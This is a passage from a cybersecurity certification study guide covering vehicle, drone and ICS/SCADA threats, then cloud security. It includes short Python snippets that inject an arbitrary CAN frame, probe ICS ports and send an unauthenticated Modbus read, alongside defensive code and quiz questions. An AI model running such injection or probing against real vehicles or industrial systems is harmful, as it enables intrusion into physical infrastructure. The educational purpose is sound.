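# Any node that can reach the bus can transmit any frame it likes.
bus = can.interface.Bus(channel="vcan0", bustype="socketcan")
frame = can.Message(
    arbitration_id=0x244,  # hypothetical ID; the sender is never authenticated
    data=[0x00, 0x00, 0x00, 0xFF],
    is_extended_id=False,
)
bus.send(frame)  # accepted by every listener that matches the ID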
Drones
Drones are managed wirelessly and, as such, offer attackers the
same door of entry as found in connected cars. In January
2020, the U.S. Department of the Interior grounded
nonemergency drones due to security concerns. Why? The U.S. Department of Defense (DoD) issued warnings that Chinese-made drones may be compromised and capable of being used for espionage. This follows a memo from the Navy & Marine
Corps Small Tactical Unmanned Aircraft Systems Program
Manager that “images, video and flight records could be
uploaded to unsecured servers in other countries via live
streaming.” Finally, the U.S. Department of Homeland Security
previously warned the private sector that their data may be
pilfered if they use commercial drone systems made in China.
Beyond the fear of Chinese-made drones that contain
backdoors, there is also the risk of a drone being “hacked” and
taken over by the attacker in midflight. Since 2016, it has been
known that it is possible in some cases to do the following:
Overwhelm the drone with thousands of connection requests,
causing the drone to land
Send large amounts of data to the drone, exceeding its capacity and
causing it to crash
Convince the drone that orders sent to land the drone were coming
from the drone itself rather than attackers, causing the drone to
follow orders and land
At the time of writing in 2020, attackers have had four years to
probe for additional attack points. It is obvious that drone
security has to be made more robust.
WORKFLOW AND PROCESS
AUTOMATION SYSTEMS
Automating workflows and processes saves time and human
resources. One of the best examples is the automation
revolution occurring in network management. Automation tools
such as Puppet, Chef, and Ansible, along with scripting, are automating once-manual tasks such as log analysis, patch application, and intrusion prevention.
These tools and scripts perform the job they do best, which is
manual drudgery, thus freeing up humans to do what they do
best, which is deep analysis and planning. Alas, with automation come vulnerabilities. An example is the cross-site
scripting (XSS) vulnerability found in IBM workflow systems, as
detailed in CVE-2019-4149, which can allow users to embed
arbitrary JavaScript code in the Web UI, thus altering the
intended functionality and potentially leading to credentials
disclosure within a trusted session. These automation systems
also need to be made more secure.
INCIDENT COMMAND SYSTEM (ICS)
The Incident Command System (ICS) was designed by FEMA to enable effective and efficient domestic incident management by integrating a combination of
facilities, equipment, personnel, procedures, and
communications operating within a common organizational
structure.
ICS provides guidance for how to organize assets to respond to
an incident (system description) and processes to manage the
response through its successive stages (concept of operations).
All response assets are organized into five functional areas:
Command, Operations, Logistics, Planning, and
Administration/Finance. Figure 5-5 highlights the five
functional areas of ICS and their primary responsibilities.
Figure 5-5 Functional Areas of ICS
SUPERVISORY CONTROL AND DATA
ACQUISITION (SCADA)
Industrial control system (ICS) is a general term that
encompasses several types of control systems used in industrial
production. The most widespread is supervisory control
and data acquisition (SCADA). SCADA is a system that
operates with coded signals over communication channels to
provide control of remote equipment. ICSs include the following
components:
Sensors: Sensors typically have digital or analog I/O, and their readings are not in a form that can be easily communicated over long distances.
Remote terminal units (RTUs): RTUs connect to the sensors
and convert sensor data to digital data, including telemetry
hardware.
Programmable logic controllers (PLCs): PLCs connect to the
sensors and convert sensor data to digital data; they do not include
telemetry hardware.
Telemetry system: Such a system connects RTUs and PLCs to
control centers and the enterprise.
Human interface: Such an interface presents data to the
operator.
ICSs should be securely segregated from other networks as a
security layer. The Stuxnet virus hit the SCADA systems used
for the control and monitoring of industrial processes. SCADA
components are considered privileged targets for cyberattacks.
By using cyber tools, it is possible to destroy an industrial process. This was the idea behind the attack on the nuclear facility at Natanz, which was intended to interfere with the Iranian nuclear program.
Considering the criticality of SCADA-based systems, physical
access to these systems must be strictly controlled. Systems that
integrate IT security with physical access controls, such as
badging systems and video surveillance, should be deployed. In
addition, a solution should be integrated with existing
information security tools such as log management and
IPS/IDS. A helpful publication by NIST, SP 800-82 Rev. 2, recommends that the major security objectives for an ICS implementation include the following:
Restricting logical access to the ICS network and network activity
Restricting physical access to the ICS network and devices
Protecting individual ICS components from exploitation
Restricting unauthorized modification of data
Detecting security events and incidents
Maintaining functionality during adverse conditions
Restoring the system after an incident
In a typical ICS, this means a defense-in-depth strategy should
include the following, according to SP 800-82 Rev. 2:
Develop security policies, procedures, training, and educational
material that applies specifically to the ICS.
Address security throughout the life cycle of the ICS.
Implement a network topology for the ICS that has multiple layers,
with the most critical communications occurring in the most secure
and reliable layer.
Provide logical separation between the corporate and ICS networks.
Employ a DMZ network architecture.
Ensure that critical components are redundant and are on
redundant networks.
Design critical systems for graceful degradation (fault tolerant) to
prevent catastrophic cascading events.
Disable unused ports and services on ICS devices after testing to ensure this will not impact ICS operation.
Restrict physical access to the ICS network and devices.
Restrict ICS user privileges to only those that are required to
perform each person’s job.
Use separate authentication mechanisms and credentials for users
of the ICS network and the corporate network.
Use modern technology, such as smart cards, for Personal Identity
Verification (PIV).
Implement security controls such as intrusion detection software,
antivirus software, and file integrity checking software, where
technically feasible, to prevent, deter, detect, and mitigate the
introduction, exposure, and propagation of malicious software to,
within, and from the ICS.
Apply security techniques such as encryption and/or cryptographic
hashes to ICS data storage and communications where determined
appropriate.
Expeditiously deploy security patches after testing all patches under
field conditions on a test system if possible, before installation on
the ICS.
Track and monitor audit trails on critical areas of the ICS.
Employ reliable and secure network protocols and services where
feasible.
SP 800-82 Rev. 2 recommends that security professionals consider the following when designing security solutions for ICS devices: timeliness and performance requirements,
availability requirements, risk management requirements,
physical effects, system operation, resource constraints,
communications, change management, managed support,
component lifetime, and component location.
ICS implementations use a variety of protocols and services,
including
Modbus: A master/slave protocol that uses port 502
BACnet: A master/slave protocol that uses port 47808 (introduced
earlier in this chapter)
LonWorks/LonTalk: A peer-to-peer protocol that uses port 1679
Distributed Network Protocol 3 (DNP3): A master/slave
protocol that uses port 19999 when using Transport Layer Security
(TLS) and port 20000 when not using TLS
ICS implementations can also use IEEE 802.1X, Zigbee, and
Bluetooth for communication.
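During an authorized assessment, the TCP ports above can be used to inventory exposed ICS services. The following is a minimal sketch in Python (standard library only) with a hypothetical target address; note that BACnet/IP runs over UDP port 47808 and will not answer a TCP connect, so it needs a different check.

import socket

ICS_PORTS = {502: "Modbus/TCP", 1679: "LonWorks/LonTalk",
             19999: "DNP3 over TLS", 20000: "DNP3"}

def probe(host: str) -> None:
    for port, name in ICS_PORTS.items():
        try:
            with socket.create_connection((host, port), timeout=2):
                print(f"{host}:{port} open ({name})")
        except OSError:
            pass  # closed, filtered, or unreachable

probe("10.0.0.5")  # hypothetical address on a network you are authorized to test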
SP 800-82 Rev. 2 outlines the following basic process for
developing an ICS security program:
1. Develop a business case for security.
2. Build and train a cross-functional team.
3. Define charter and scope.
4. Define specific ICS policies and procedures.
5. Implement an ICS Security Risk Management Framework.
1. Define and inventory ICS assets.
2. Develop a security plan for ICS systems.
3. Perform a risk assessment.
4. Define the mitigation controls.
6. Provide training and raise security awareness for ICS staff.
The ICS security architecture should include network
segregation and segmentation, boundary protection, firewalls, a
logically separated control network, and dual network interface
cards (NICs) and should focus mainly on suitable isolation
between control networks and corporate networks. Security
professionals should also understand that many ICS/SCADA
systems use weak authentication and outdated operating
systems. Many of these systems cannot easily be patched, and the frequent lack of available patches means that the vendor is usually not proactively addressing identified security issues. Finally,
many of these systems allow unauthorized remote access,
thereby making it easy for an attacker to breach the system with
little effort.
Modbus
As you learned in the previous discussion, Modbus is one of the
protocols used in industrial control systems. It is a serial
protocol created by Modicon (now Schneider Electric) to be
used by its PLCs. It is popular because it is royalty free. It
enables communication among many devices connected to the
same network; for example, a system that measures water flow
and communicates the results to a computer. An example of a
Modbus architecture is shown in Figure 5-6.
Figure 5-6 Modbus Architecture
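Modbus's simplicity is also its weakness: the protocol itself carries no authentication or encryption, so anyone who can reach TCP port 502 can issue requests. The following is a minimal sketch in Python (standard library only) that hand-builds a Modbus/TCP Read Holding Registers request (function code 3); the host, unit, and register values are hypothetical.

import socket
import struct

def read_holding_registers(host: str, unit: int, start: int, count: int) -> bytes:
    pdu = struct.pack("!BHH", 0x03, start, count)  # function code 3 + start + count
    # MBAP header: transaction ID, protocol ID (always 0), length, unit ID
    mbap = struct.pack("!HHHB", 1, 0, len(pdu) + 1, unit)
    with socket.create_connection((host, 502), timeout=3) as s:
        s.sendall(mbap + pdu)  # no credentials required by the protocol
        return s.recv(256)

print(read_holding_registers("10.0.0.5", unit=1, start=0, count=2).hex())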
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 5-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 5-2 Key Topics in Chapter 5

Key Topic Element | Description | Page Number
Bulleted list | Threats presented by the introduction of personal mobile devices into the workplace | 97
Bulleted list | Security best practices when developing push notification services | 100
Section | Mobile payment technologies | 101
Bulleted list | Steps to secure NFC payment mechanisms | 101
Bulleted list | IoT deployment categories | 104
Bulleted list | Methods of securing IoT devices | 104
Bulleted list | Considerations when selecting IoT devices | 104
Bulleted list | Physical access control systems | 108
Bulleted list | IoT wireless issues | 109
Bulleted list | Issues to consider and plan for when implementing IP video systems | 110
Bulleted list | ICS components | 115
Bulleted list | Security objectives for an ICS implementation | 115
Bulleted list | ICS defense-in-depth strategy | 115
Bulleted list | ICS protocols | 117
Numbered list | Developing an ICS security program | 117
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
mobile device management (MDM)
bring your own device (BYOD) policies
Payment Card Industry Data Security Standard (PCI DSS)
USB On-The-Go (USB OTG)
rooting or jailbreaking
push notification services
geotagging
near field communication (NFC)
domain bridging
Internet of Things (IoT)
embedded system
real-time operating system (RTOS)
System-on-Chip (SoC)
field programmable gate array (FPGA)
mantrap
proximity readers
Building Automation and Control Networks (BACnet)
Controller Area Network (CAN bus)
Incident Command System (ICS)
supervisory control and data acquisition (SCADA)
remote terminal units (RTUs)
programmable logic controllers (PLCs)
telemetry system
Modbus
LonWorks/LonTalk
Distributed Network Protocol 3 (DNP3)
REVIEW QUESTIONS
1. List at least two threats presented by the introduction of
personal mobile devices (smartphones and tablets) into an
organization’s network.
2. What is the single biggest threat to mobile devices?
3. Match the term on the left with its definition on the right.
Terms | Definitions
USB OTG | Used to control mobile device settings, applications, and other parameters when those devices are attached to the enterprise network
BYOD | A specification first used in late 2001 that allows USB devices, such as tablets or smartphones, to act as either a USB host or a USB device
MDM | Policies designed to allow personal devices in the network
ICS | Designed to provide a way to enable effective and efficient domestic incident management by integrating a combination of facilities, equipment, personnel, procedures, and communications operating within a common organizational structure
4. ___________________ refers to a system of
interrelated computing devices, mechanical and digital
machines, and objects that are provided with unique
identifiers and the ability to transfer data over a network
without requiring human-to-human or human-to-computer
interaction.
5. What process enabled the enemy to pinpoint the location of
four U.S. Army Apache helicopters on the ground and
destroy them?
6. Match the term on the left with its definition on the right.
Terms | Definitions
Embedded system | A system that operates with coded signals over communication channels to provide control of remote equipment
SoC | Industrial control system component that connects to the sensors and converts sensor data to digital data, including telemetry hardware
RTU | An integrated circuit (also known as a chip) that integrates all components of a computer or other electronic system
SCADA | A piece of software built into a larger piece of software
7. __________________ is a text messaging service
component of most telephone, World Wide Web, and mobile
telephony systems.
8. List at least one example of an IoT deployment.
9. A(n) __________________ is a series of two doors with
a small room between them.
10. To use the BACnet protocol in an IP world,
__________________ was developed.
Chapter 6
Threats and Vulnerabilities
Associated with Operating
in the Cloud
This chapter covers the following topics related to Objective 1.6
(Explain the threats and vulnerabilities associated with operating
in the cloud) of the CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification exam:
Cloud service models: Describes Software as a Service (SaaS),
Platform as a Service (PaaS), and Infrastructure as a Service (IaaS).
Cloud deployment models: Covers public, private, community,
and hybrid clouds.
Function as a Service (FaaS)/serverless architecture:
Discusses the concepts of FaaS.
Infrastructure as Code (IaC): Investigates the use of scripting
in the environment.
Insecure application programming interface (API):
Identifies vulnerabilities in the use of APIs.
Improper key management: Discusses best practices for key
management.
Unprotected storage: Describes threats to storage systems.
Logging and monitoring: Covers issues related to insufficient
logging and monitoring and inability to access logging tools.
Placing resources in a cloud environment has many benefits,
but also introduces a host of new security considerations. This
chapter discusses these vulnerabilities and some measures that
you can take to mitigate them.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these eight self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 6-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 6-1 “Do I Know This Already?” Foundation Topics Section-to-Question Mapping

Foundation Topics Section | Question
Cloud Deployment Models | 1
Cloud Service Models | 2
Function as a Service (FaaS)/Serverless Architecture | 3
Infrastructure as Code (IaC) | 4
Insecure Application Programming Interface (API) | 5
Improper Key Management | 6
Unprotected Storage | 7
Logging and Monitoring | 8
Caution
The goal of self-assessment is to gauge your mastery of the topics in this
chapter. If you do not know the answer to a question or are only partially sure of
the answer, you should mark that question as wrong for purposes of the self-assessment. Giving yourself credit for an answer you correctly guess skews your self-assessment results and might provide you with a false sense of security.
1. In which cloud deployment model does an organization
provide and manage some resources in-house and has other
resources provided externally via a public cloud?
1. Private
2. Public
3. Community
4. Hybrid
2. Which of the following cloud service models is typically used
as a software development environment?
1. SaaS
2. PaaS
3. IaaS
4. FaaS
3. Which of the following is an extension of the PaaS model?
1. FaaS
2. IaC
3. SaaS
4. IaaS
4. Which of the following manages and provisions computer
data centers through machine-readable definition files?
1. IaC
2. PaaS
3. SaaS
4. IaaS
5. Which of the following can enhance security of APIs?
1. DPAPI
2. SGX
3. SOAP
4. REST
6. Which of the following contains recommendations for key
management?
1. NIST SP 800-57 Rev. 5
2. PCI-DSS
3. OWASP
4. FIPS
7. Which of the following is the most exposed part of a cloud
deployment?
1. Cryptographic functions
2. APIs
3. VMs
4. Containers
8. Which of the following is lost with improper auditing?
(Choose the best answer.)
1. Cryptographic security
2. Accountability
3. Data security
4. Visibility
FOUNDATION TOPICS
CLOUD DEPLOYMENT MODELS
Cloud computing is all the rage these days, and it comes in
many forms. The basic idea of cloud computing is to make
resources available in a web-based data center so the resources
can be accessed from anywhere. When a company pays another
company to host and manage this type of environment, it is
considered to be a public cloud solution. If the company hosts
this environment itself, it is considered to be a private cloud
solution. The different cloud deployment models are as follows:
Public: A public cloud is the standard cloud deployment model,
in which a service provider makes resources available to the public
over the Internet. Public cloud services may be free or may be
offered on a pay-per-use model. An organization needs to have a
business or technical liaison responsible for managing the vendor
relationship but does not necessarily need a specialist in cloud
deployment. Vendors of public cloud solutions include Amazon,
IBM, Google, Microsoft, and many more. In a public cloud
deployment model, subscribers can add and remove resources as
needed, based on their subscription.
Private: A private cloud is a cloud deployment model in which a
private organization implements a cloud in its internal enterprise,
and that cloud is used by the organization’s employees and
partners. Private cloud services require an organization to employ a
specialist in cloud deployment to manage the private cloud.
Community: A community cloud is a cloud deployment model
in which the cloud infrastructure is shared among several
organizations from a specific group with common computing needs.
In this model, agreements should explicitly define the security
controls that will be in place to protect the data of each organization
involved in the community cloud and how the cloud will be
administered and managed.
Hybrid: A hybrid cloud is a cloud deployment model in which
an organization provides and manages some resources in-house
and has others provided externally via a public cloud. This model requires a relationship with the service provider as well as an in-house cloud deployment specialist. Rules need to be defined to ensure that a hybrid cloud is deployed properly. Confidential and
private information should be limited to the private cloud.
CLOUD SERVICE MODELS
There is a trade-off to consider when a decision must be made between cloud architectures. A private solution provides the
most control over the safety of your data but also requires the
staff and the knowledge to deploy, manage, and secure the
solution. A public cloud puts your data’s safety in the hands of a
third party, but that party is more capable and knowledgeable
about protecting data in such an environment and managing
the cloud environment. With a public solution, various cloud
service models can be purchased. Some of these models include
the following:
Software as a Service (SaaS): With SaaS, the vendor provides
the entire solution, including the operating system, the
infrastructure software, and the application. The vendor may
provide an email system, for example, in which it hosts and
manages everything for the customer. An example of this is a
company that contracts to use Salesforce or Intuit QuickBooks
using a browser rather than installing the application on every
machine. This frees the customer company from performing
updates and other maintenance of the applications.
Platform as a Service (PaaS): With PaaS, the vendor provides
the hardware platform or data center and the software running on
the platform, including the operating systems and infrastructure
software. The customer is still involved in managing the system. An
example of this is a company that engages a third party to provide a
development platform for internal developers to use for
development and testing.
Infrastructure as a Service (IaaS): With IaaS, the vendor
provides the hardware platform or data center, and the customer
installs and manages its own operating systems and application
systems. The vendor simply provides access to the data center and
maintains that access. An example of this is a company hosting all
its web servers with a third party that provides the infrastructure.
With IaaS, customers can benefit from the dynamic allocation of
additional resources in times of high activity, while those same
resources are scaled back when not needed, which saves money.
Figure 6-1 illustrates the relationship of these services to one
another.
FIGURE 6-1 Cloud Service Models
FUNCTION AS A SERVICE
(FAAS)/SERVERLESS ARCHITECTURE
Function as a Service (FaaS) is an extension of PaaS that
goes further and completely abstracts the virtual server from the
developers. In fact, charges are based not on server instance
sizes but on consumption and executions. This is why it is
sometimes also called serverless architecture. In this
architecture, the focus is on a function, operation, or piece of
code that is executed as a function. These services are event-driven in nature.
Although FaaS is not perfect for every workload, for
transactions that happen hundreds of times per second, there is
a lot of value in isolating that logic to a function that can be
scaled. Additional advantages include the following:
Ideal for dynamic or burstable workloads: If you run
something only once a day or month, there’s no need to pay for a
server 24/7/365.
Ideal for scheduled tasks: FaaS is a perfect way to run a certain
piece of code on a schedule.
Figure 6-2 shows a useful car analogy for comparing traditional
computing (own a car), cloud computing (rent a car), and
FaaS/serverless computing (car sharing). VPS in the rent-a-car
analogy stands for virtual private server and refers to
provisioning a virtual server from a cloud service provider.
Figure 6-2 Car Analogy for Serverless Computing
The following are top security issues with serverless computing (the first is illustrated in the sketch after this list):
Function event data injection: Triggered through untrusted
input such as through a web API call
Broken authentication: Coding issues ripe for exploit and
attacks, which lead to unauthorized authentication
Insecure serverless deployment configuration: Human
error in setup
Over-privileged function permissions and roles: Failure to
implement the least privilege concept
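To make the first issue concrete, the following is a minimal sketch in Python of an AWS Lambda-style handler; the event shape and field names are hypothetical. The point is that everything in the event is untrusted input and must be validated before use.

import json
import re

ORDER_ID = re.compile(r"^[A-Za-z0-9-]{1,36}$")

def handler(event, context):
    # Never pass event fields straight into queries or shell commands.
    order_id = str(event.get("order_id", ""))
    if not ORDER_ID.fullmatch(order_id):
        return {"statusCode": 400, "body": json.dumps({"error": "bad order_id"})}
    # ... a safe, parameterized lookup of order_id would go here ...
    return {"statusCode": 200, "body": json.dumps({"order_id": order_id})}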
INFRASTRUCTURE AS CODE (IAC)
In another reordering of the way data centers are handled,
Infrastructure as Code (IaC) manages and provisions
computer data centers through machine-readable definition
files, rather than physical hardware configuration or interactive
configuration tools. IaC can use either scripts or declarative
definitions, rather than manual processes, but the term more
often is used to promote declarative approaches.
Naturally, there are advantages to this approach:
Lower cost
Faster speed
Risk reduction (remove errors and security violations)
Figure 6-3 illustrates an example of how some code might be
capable of making changes on its own without manual
intervention. As you can see in Figure 6-3, these code changes
can be made to the actual state of the configurations in the
cloud without manual intervention.
Figure 6-3 IaC in Action
Security issues with Infrastructure as Code (IaC) include the following (a sketch addressing hardcoded secrets follows this list):
Compliance violations: Policy guardrails based on standards are
not enforced
Data exposures: Lack of encryption
Hardcoded secrets: Storing plain text credentials, such as SSH
keys or account secrets, within source code
Disabled audit logs: Failure to utilize audit logging services like
AWS CloudTrail and Amazon CloudWatch
Untrusted image sources: Templates may inadvertently refer to
OS or container images from untrusted sources
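One control for the hardcoded secrets issue is to scan templates before they are committed. The following is a minimal sketch in Python (standard library only); the patterns and directory name are illustrative, and real pipelines typically rely on dedicated secret-scanning tools.

import re
from pathlib import Path

SUSPECT = re.compile(
    r"(aws_secret_access_key|password|private_key)\s*[:=]\s*\S+",
    re.IGNORECASE,
)

def scan(root: str) -> None:
    # Flag lines in IaC templates that look like plaintext credentials.
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in {".tf", ".yml", ".yaml", ".json"}:
            for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
                if SUSPECT.search(line):
                    print(f"{path}:{lineno}: possible hardcoded secret")

scan("./infrastructure")  # hypothetical template directory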
INSECURE APPLICATION PROGRAMMING
INTERFACE (API)
Interfaces and APIs tend to be the most exposed parts of a
system because they’re usually accessible from the open
Internet. APIs are used extensively in cloud environments. With
respect to APIs, a host of approaches—including Simple Object
Access Protocol (SOAP), REpresentational State Transfer
(REST), and JavaScript Object Notation (JSON)—are available,
and many enterprises find themselves using all of them.
The use of diverse protocols and APIs is also a challenge to
interoperability. With networking, storage, and authentication
protocols, support and understanding of the protocols in use is
required of both endpoints. It should be a goal to reduce the
number of protocols in use in order to reduce the attack surface.
Each protocol has its own history of weaknesses to mitigate.
One API that can enhance cloud security is the Data
Protection API (DPAPI) offered by Windows. Let’s look at
what it offers. Among other features, DPAPI supports in-memory processing, an approach in which all data in a set is processed from memory rather than from the hard drive. In-memory processing assumes that all the data is available in
memory rather than just the most recently used data, as is
usually the case when using RAM or cache memory. This results
in faster reporting and decision making in business. Securing
in-memory processing requires encrypting the data in RAM.
DPAPI lets you encrypt data using the user’s login credentials.
One of the key questions is where to store the key, because
storing it in the same location as the data typically is not a good
idea (the next section discusses key management). Intel’s
Software Guard Extensions (SGX), shipping with Skylake and
newer CPUs, allows you to load a program into your processor,
verify that its state is correct (remotely), and protect its
execution. The CPU automatically encrypts everything leaving
the processor (that is, everything that is offloaded to RAM) and
thereby ensures security.
Even the most secure devices have some sort of API that is used
to perform tasks. Unfortunately, untrustworthy people use
those same APIs to perform unscrupulous tasks. APIs are used
in the Internet of Things (IoT) so that devices can speak to each
other without users even knowing they are there. APIs are used
to control and monitor things we use every day, including
fitness bands, home thermostats, lighting, and automobiles.
Comprehensive security must protect the entire spectrum of
devices in the digital workplace, including apps and APIs. API
security is critical for an organization that is exposing digital
assets.
Guidelines for providing API security include the following (see the HMAC sketch after this list):
Use the same security controls for APIs as for any web application
in the enterprise.
Use Hash-based Message Authentication Code (HMAC).
Use encryption when passing static keys.
Use a framework or an existing library to implement security
solutions for APIs.
Implement password encryption instead of single key-based
authentication.
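The HMAC guideline is straightforward to apply. The following is a minimal sketch in Python (standard library only): the client signs each request body with a shared secret, and the server recomputes the tag and compares it in constant time, so any tampering with the body invalidates the signature.

import hashlib
import hmac

SECRET = b"..."  # shared out of band and stored securely, never in source code

def sign(body: bytes) -> str:
    return hmac.new(SECRET, body, hashlib.sha256).hexdigest()

def verify(body: bytes, tag: str) -> bool:
    return hmac.compare_digest(sign(body), tag)

tag = sign(b'{"item": 42}')
print(verify(b'{"item": 42}', tag))  # True
print(verify(b'{"item": 43}', tag))  # False -- the body was tampered with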
IMPROPER KEY MANAGEMENT
Key management is essential to ensure that the cryptography
provides confidentiality, integrity, and authentication in cloud
environments. If a key is compromised, it can have serious
consequences throughout an organization.
Key management involves the entire process of ensuring that
keys are protected during creation, distribution, transmission,
and storage. As part of this process, keys must also be destroyed
properly. When you consider the vast number of networks over
which the key is transmitted and the different types of systems
on which a key is stored, the enormity of this issue really comes
to light.
Because key management is the most demanding and critical aspect of cryptography, it is important that security professionals understand key management principles.
Keys should always be stored in ciphertext when stored on a
noncryptographic device. Key distribution, storage, and maintenance should be automated by integrating the processes into the application.
Because keys can be lost, backup copies should be made and
stored in a secure location. A designated individual should have
control of the backup copies, and other individuals should be
designated to serve as emergency backups. The key recovery
process should also require more than one operator, to ensure
that only valid key recovery requests are completed. In some
cases, keys are even broken into parts and deposited with
trusted agents, who provide their part of the key to a central
authority when authorized to do so. Although other methods of
distributing parts of a key are used, all the solutions involve the use of trusted agents entrusted with part of the key and a central authority tasked with assembling the key from its parts. Also,
key recovery personnel should span across the entire
organization and not just be members of the IT department.
Organizations should also limit the number of keys that are
used. The more keys that you have, the more keys you must
ensure are protected. Although a valid reason for issuing a key
should never be ignored, limiting the number of keys issued and
used reduces the potential damage.
When designing the key management process, you should consider how to do the following (a short sketch follows the list):
Securely store and transmit the keys
Use random keys
Issue keys of sufficient length to ensure protection
Properly destroy keys when no longer needed
Back up the keys to ensure that they can be recovered
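Two of these points, using random keys and storing keys only in ciphertext, can be sketched briefly. The following Python fragment assumes the third-party cryptography package; a data key is wrapped (encrypted) under a master key, so only ciphertext is ever written to a noncryptographic device. In practice, the master key would live in an HSM or a cloud KMS rather than in memory.

from cryptography.fernet import Fernet

master_key = Fernet.generate_key()  # in practice, held in an HSM or KMS
data_key = Fernet.generate_key()    # random key of sufficient length

wrapped = Fernet(master_key).encrypt(data_key)    # safe to store on disk
recovered = Fernet(master_key).decrypt(wrapped)   # recover the key for use
assert recovered == data_key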
Systems that process valuable information require controls in
order to protect the information from unauthorized disclosure
and modification. Cryptographic systems that contain keys and
other cryptographic information are especially critical. Security
professionals should work to ensure that the protection of
keying material provides accountability, audit, and survivability.
Accountability involves the identification of entities that have
access to, or control of, cryptographic keys throughout their life
cycles. Accountability can be an effective tool to help prevent
key compromises and to reduce the impact of compromises
when they are detected. Although it is preferred that no humans be able to view keys, at a minimum the key management system should account for all individuals who are able to view
plaintext cryptographic keys. In addition, more sophisticated
key management systems may account for all individuals
authorized to access or control any cryptographic keys, whether
in plaintext or ciphertext form.
Two types of audits should be performed on key management
systems:
Security: The security plan and the procedures that are developed
to support the plan should be periodically audited to ensure that
they continue to support the key management policy.
Protective: The protective mechanisms employed should be
periodically reassessed with respect to the level of security they
currently provide and are expected to provide in the future. They
should also be assessed to determine whether the mechanisms
correctly and effectively support the appropriate policies. New
technology developments and attacks should be considered as part
of a protective audit.
Key management survivability entails backing up or archiving
copies of all keys used. Key backup and recovery procedures
must be established to ensure that keys are not lost. System
redundancy and contingency planning should also be properly
assessed to ensure that all the systems involved in key
management are fault tolerant.
Key Escrow
Key escrow is the process of storing keys with a third party to
ensure that decryption can occur. This is most often used to
collect evidence during investigations. Key recovery is the
process whereby a key is archived in a safe place by the
administrator.
Key Stretching
Key stretching, also referred to as key strengthening, is a
cryptographic technique that involves making a weak key
stronger by increasing the time it takes to test each possible key.
In key stretching, the original key is fed into an algorithm to
produce an enhanced key, which should be at least 128 bits for
effectiveness. If key stretching is used, an attacker would need
to either try every possible combination of the enhanced key or
try likely combinations of the initial key. Key stretching slows
down the attacker because the attacker must compute the
stretching function for every guess in the attack. Systems that
use key stretching include Pretty Good Privacy (PGP), GNU
Privacy Guard (GPG), Wi-Fi Protected Access (WPA), and
WPA2. Widely used password key-stretching algorithms include
Password-Based Key Derivation Function 2 (PBKDF2), bcrypt,
and scrypt.
UNPROTECTED STORAGE
While cloud storage may seem like a great idea, it presents
many unique issues. Among them are the following:
Data breaches: Although cloud providers may include safeguards
in service-level agreements (SLAs), ultimately the organization is
responsible for protecting its own data, regardless of where it is
located. When this data is not in your hands—and you may not even
know where it is physically located at any point in time—protecting
your data is difficult.
Authentication system failures: These failures allow malicious
individuals into the cloud. This issue sometimes is made worse by
the organization itself when developers embed credentials and
cryptographic keys in source code and leave them in public-facing
repositories.
Weak interfaces and APIs: Interfaces and APIs tend to be the
most exposed parts of a system because they’re usually accessible
from the open Internet.
Transfer/Back Up Data to Uncontrolled Storage
In some cases, users store sensitive data in cloud storage that is
outside the control of the organization, using sites such as
Dropbox. These storage providers have had their share of data
loss issues as well. Policies should address and forbid this type
of storage of data from mobile devices.
Cloud services give end users more accessibility to their data.
However, this also means that end users can take advantage of
cloud storage to access and share company data from any
location. At that point, the IT team no longer controls the data.
This is the case with both public and private clouds.
With private clouds, organizations can ensure the following:
That the data is stored only on internal resources
That the data is owned by the organization
That only authorized individuals are allowed to access the data
That data is always available
However, a private cloud is only protected by the organization’s
internal resources, and this protection can often be affected by
the knowledge level of the security professionals responsible for
managing the cloud security.
With public clouds, organizations can ensure the following:
That data is protected by enterprise-class firewalls and within a
secured facility
That attackers and disgruntled employees are unsure of where the
data actually resides
That the cloud vendor provides security expertise and maintains the
level of service detailed in the contract
However, public clouds can grant access to any location, and
data is transmitted over the Internet. Also, the organization
depends on the vendor for all services provided. End users must
be educated about cloud usage and limitations as part of their
security awareness training. In addition, security policies should
clearly state where data can be stored, and ACLs should be
configured properly to ensure that only authorized personnel
can access data. The policies should also spell out consequences
for storing organizational data in cloud locations that are not
authorized.
Big Data
Big data is a term for sets of data so large or complex that they
cannot be analyzed by using traditional data processing
applications. These data sets are often stored in the cloud to
take advantage of the immense processing power available
there. Specialized applications have been designed to help
organizations with their big data. The big data challenges that
may be encountered include data analysis, data capture, data
search, data sharing, data storage, and data privacy.
While big data is used to determine the causes of failures,
generate coupons at checkout, recalculate risk portfolios, and
find fraudulent activity before it ever has a chance to affect the
organization, its existence creates security issues. The first issue
is its unstructured nature. Traditional data warehouses process
structured data and can store large amounts of it, but there is
still a requirement for structure.
Big data typically uses Hadoop, which requires no structure.
Hadoop is an open source framework used for running
applications and storing data. With the Hadoop Distributed File
System, individual servers that are working in a cluster can fail
without aborting the entire computation process. There are no
restrictions on the data that this system can store. While big
data is enticing because of the advantages it offers, it presents a
number of issues when deployed in the cloud.
Organizations still do not understand it very well, and unexpected
vulnerabilities can easily be introduced.
Open source code is commonly used in big data solutions, which can result in unrecognized backdoors, and such code can contain default credentials.
Attack surfaces of the nodes may not have been reviewed, and
servers may not have been hardened sufficiently.
LOGGING AND MONITORING
Without proper auditing, you have no accountability. You also
have no way of knowing what is going on in your environment.
While the next two chapters include ample discussion of logging
and monitoring and its application, this section briefly
addresses the topic with respect to cloud environments.
Insufficient Logging and Monitoring
Unfortunately, although most technicians agree with and
support the notion that proper auditing is necessary, in the case
of cloud deployments, the logging and monitoring can leave
much to be desired. “Insufficient Logging and Monitoring” is
one of the categories in the Open Web Application Security
Project’s (OWASP) Top 10 list and covers the list of best
practices that should be in place to prevent or limit the damage
of security breaches.
Security professionals should work to ensure that cloud SLAs
include access to logging and monitoring tools that give the
